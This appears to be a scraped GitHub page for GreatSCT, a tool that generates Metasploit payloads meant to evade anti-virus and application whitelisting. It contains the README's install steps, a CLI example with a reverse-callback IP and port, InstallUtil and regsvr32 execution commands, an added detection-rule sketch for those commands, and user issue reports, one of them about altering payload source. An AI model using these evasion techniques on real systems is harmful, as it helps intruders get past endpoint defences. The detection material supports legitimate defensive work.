greatsct's Introduction

GreatSCT

GreatSCT is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions and application whitelisting solutions.

GreatSCT is currently supported by @ConsciousHacker.

Software Requirements:

Linux

  1. Kali - run the setup script - sudo ./setup.sh -c

NOTE: Support for distributions other than Kali Linux will be coming soon.

Setup (tl;dr)

NOTE: Installation must be done with superuser privileges. If you are not using Kali Linux, prepend each command with sudo or change to the root user before beginning.

Run ./setup.sh -c on Linux.

Install by cloning from git, not via apt!

Quick Install

apt-get -y install git
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/
cd setup
sudo ./setup.sh -c

Regenerating Config

NOTE: This must be done with superuser privileges. If you are not using Kali Linux, prepend each command with sudo or change to the root user before beginning.

Most of the time the config file at /etc/greatsct/settings.py will not need to be rebuilt but in some cases you might be prompted to do so. The file is generated by config/update.py.

It is important that you are in the config/ directory before executing update.py. If you are not, settings.py will be incorrect and when you launch GreatSCT you will see the following.

    Main Menu

            0 payloads loaded

Don't panic. Enter the config/ dir and re-run update.py.

Example Usage

GreatSCT's Main Menu:

                             GreatSCT | [Version]: 1.0
===============================================================================
      [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================

Main Menu

	1 tools loaded

Available Commands:

	exit			Exit GreatSCT
	info			Information on a specific tool
	list			List available tools
	update			Update GreatSCT
	use			Use a specific tool

Main menu choice: 


Help

usage: GreatSCT.py [--update] [--version] [--list-tools] [-t Bypass] [--ip IP]
                   [--port Port] [--list-payloads]
                   [-c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]]
                   [-o OUTPUT NAME] [-p [PAYLOAD]] [--clean]
                   [--msfoptions [OPTION=value [OPTION=value ...]]]
                   [--msfvenom [windows/meterpreter/reverse_tcp]]

GreatSCT is a framework to generate application whitelisting bypasses.

GreatSCT Options:
  --update              Update the GreatSCT framework.
  --version             Displays version and quits.
  --list-tools          List GreatSCT's tools
  -t Bypass, --tool Bypass
                        Specify GreatSCT tool to use (Bypass)

Callback Settings:
  --ip IP, --domain IP  IP Address to connect back to
  --port Port           Port number to connect to.

[*] Payload Settings:
  --list-payloads       Lists all available payloads for that tool

Great Scott Options:
  -c [OPTION1=value OPTION2=value [OPTION1=value OPTION2=value ...]]
                        Custom payload module options.
  -o OUTPUT NAME        Output file base name for source and compiled
                        binaries.
  -p [PAYLOAD]          Payload to generate. Lists payloads if none specified.
  --clean               Clean out payload folders.
  --msfoptions [OPTION=value [OPTION=value ...]]
                        Options for the specified metasploit payload.
  --msfvenom [windows/meterpreter/reverse_tcp]
                        Metasploit shellcode to generate.

GreatSCT Bypass CLI

# ./GreatSCT.py --ip 192.168.157.136 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
===============================================================================
                                   Great Scott!
===============================================================================
      [Web]: https://github.com/GreatSCT/GreatSCT | [Twitter]: @ConsciousHacker
===============================================================================

 [*] Language: installutil_powershell
 [*] Payload Module: installutil/powershell/script
 [*] Executable written to: /usr/share/greatsct-output/compiled/payload4.exe
 [*] Source code written to: /usr/share/greatsct-output/source/payload4.cs
 [*] Execute with: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload4.exe
#
# file /usr/share/greatsct-output/compiled/payload4.exe
/usr/share/greatsct-output/compiled/payload4.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
#
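For defenders, the "Execute with:" line in the output above is the most useful artifact: InstallUtil.exe started with an empty /logfile= and /LogToConsole=false, and, in an issue report further down this page, regsvr32.exe registering a scriptlet through scrobj.dll. The detection sketch below is an added example, not part of GreatSCT; the rule names, the event layout and the sample events are assumptions constructed for illustration.

```python
import re

# Rules derived from the two "Execute with:" command lines shown on this page.
# Rule names and the event layout are assumptions made for this example.
RULES = {
    "installutil_suppressed_logging": (
        re.compile(r"\binstallutil(\.exe)?\b", re.I),
        [re.compile(r"/logfile=(\s|$)", re.I),
         re.compile(r"/logtoconsole=false\b", re.I)],
    ),
    "regsvr32_scriptlet_registration": (
        re.compile(r"\bregsvr32(\.exe)?\b", re.I),
        [re.compile(r"/i:\S+", re.I),
         re.compile(r"\bscrobj\.dll\b", re.I)],
    ),
}

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "command_line": r"C:\Windows\Microsoft.NET\Framework"
     r"\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload4.exe"},
    {"host": "ws02", "command_line":
     "regsvr32.exe /u /n /i:./GenerateAll/regsvr32.sct scrobj.dll"},
    {"host": "ws03", "command_line": r"C:\Windows\Microsoft.NET\Framework"
     r"\v4.0.30319\InstallUtil.exe /logfile=C:\logs\svc.log C:\svc\MyService.exe"},
    {"host": "ws04", "command_line": r"regsvr32.exe /s C:\Windows\System32\msxml6.dll"},
]

def match_rules(command_line):
    """Return the names of all rules whose binary and every indicator match."""
    hits = []
    for name, (binary, indicators) in RULES.items():
        if binary.search(command_line) and all(
                p.search(command_line) for p in indicators):
            hits.append(name)
    return hits

def detect(events):
    """Return (host, rule) pairs for every event that trips a rule."""
    return [(e["host"], rule)
            for e in events for rule in match_rules(e["command_line"])]

if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(f"ALERT {host}: {rule}")
```

The rules match on arguments rather than on the payload's file name, so the base name chosen with -o does not affect them.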

Credits

https://github.com/veil-Framework/

Licensing

This project is licensed under the GNU General Public License v3.

greatsct's People

Contributors

christruncer, conscioushacker, dietrichsec, hoodsware, script-nomad

greatsct's Issues

please check this error

./GreatSCT.py --ip 192.168.8.100 --port 4444 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
Traceback (most recent call last):
File "./GreatSCT.py", line 103, in
the_conductor.command_line_use()
File "/root/Desktop/GreatSCT/lib/common/orchestra.py", line 38, in command_line_use
tool_object.cli_menu()
File "Tools/Bypass/Tool.py", line 200, in cli_menu
user_cli_payload.generate()
File "Tools/Bypass/payloads/installutil/powershell/script.py", line 54, in generate
with open(self.required_options["SCRIPT"][0], "r") as f:
FileNotFoundError: [Errno 2] No such file or directory: '/root/script.ps1'

error while testing

Dear Team,

I was able to pull the git with the develop branch and have the result as below. Would you please take a look and tell me why I have one successful session but the CSV file reports all failed?

I have nothing to say for myself

File "gr8sct.py", line 133
self.multipleApplicable = {**self.multipleApplicable, **tempDict} #...I have nothing to say for myself
^
SyntaxError: invalid syntax

Error starting GreatSct

When I start the tool with ./Greatsct.py it briefly displays some syntax errors on screen but opens the main menu. I choose list, it gives me 1)Bypass, but when I choose bypass it returns to the main menu. What to do?

Unable to find 'generateAll' option with new GreatSCT release?

Dear GreatSCT,

Thank you for an amazing tool.

In your previous release I used to generate payloads in different formats using the 'generateAll' option, which I am unable to find in the new release.

Is this option still supported? If yes, how do I use it with the new release?

Thanks a lot.

Regards,
-Bhadresh

unable to generate using MSFVenom

Using regsvcs/shellcode_inject/base64.py and selecting "Enter" for windows/meterpreter/reverse_tcp gives [!] ERROR: Invalid payload specified! and using Tab yields "Windows/". Not sure if this is my error somewhere or something else? The steps I used to this point were the same as in the demo video recorded at Circle City Con. Thank you.

Error in victim side

Hi,
Does someone know what the problem is?
I used the module --> regasm/meterpreter/rev_https

[ERROR] Failed to install dependencies (Metasploit-Framework)... Exit code: 100

Version Information:

Debug: userhomedir = /root
Debug: rootdir = /root/GreatSCT
Debug: trueuser = root
Debug: userprimarygroup = root
Debug: os = kali
Debug: version = "2018.4"
Debug: winedir = /root/.greatsct

[I] Kali Linux "2018.4" x86_64 detected...

I installed Kali, did an apt update, did an apt upgrade, and then attempted the "./setup.sh -c".

error while generating payload for testing purposes

Dear Team,

I ran your script on my Kali box and tried to test the capability of detecting malware with my Windows. However, these are the errors that I got when running the script with python3 on my Kali:

Execute with: regsvr32.exe /u /n /i:./GenerateAll/regsvr32.sct scrobj.dll

Exception in thread Thread-3:
Traceback (most recent call last):
File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
self.run()
File "/usr/lib/python3.5/threading.py", line 862, in run
self._target(*self._args, **self._kwargs)
File "/root/Downloads/GreatSCT/fileOps.py", line 47, in generate
return (self.genFromTemplate(template))
File "/root/Downloads/GreatSCT/fileOps.py", line 92, in genFromTemplate
shellcodex64 = generator.genShellcode(domain, port, "x64", extraProcessing)
File "/root/Downloads/GreatSCT/generator.py", line 39, in genShellcode
shellcode = self.b64Encode(shellcode)
File "/root/Downloads/GreatSCT/generator.py", line 57, in b64Encode
shellcode = str(base64.b64encode(code))
File "/usr/lib/python3.5/base64.py", line 59, in b64encode
encoded = binascii.b2a_base64(s)[:-1]
TypeError: a bytes-like object is required, not 'str'


Would you please tell me what I did wrong and how to fix it?

Sincerely,

Toto

dll problem

Hello. This is a great program, thanks for everything. I have a problem, but it is not related to your program.
I am creating a DLL file with this method: "regsvcs/meterpreter/rev_tcp.py"
I get a DLL file and a .cs file with the above method. I want to make some changes to the .cs file.

For example, I change function names. I am converting the .cs file to a .dll file with the Visual Studio prompt.
With this command, I convert the .cs file to DLL format: csc /target:library /out:MyMaths.dll payload.cs

But I also get an error when I want to run the DLL file with regsvcs.exe.
This error:
"1: 'C:\Users\Cyberthereaper\Desktop\MyMaths.dll' 'has no descriptive name

How to fix this problem?

Other method:
I'm opening the .cs file with Visual Studio 2017. I added the references "System.EnterpriseServices" and "System.Windows.Forms". I compiled the payload.cs file as a class library.

But I also get an error when I want to run the DLL file with regsvcs.exe:
Invalid classes derived from "servicedcomponent" ..Classes must be public and concrete, must be public default builders, and must meet all other ComVisibility requirements
lIUPQhMj.NfyxwnnZjTe: Unspecified error

What is the problem? How are you converting the .cs file to a DLL?
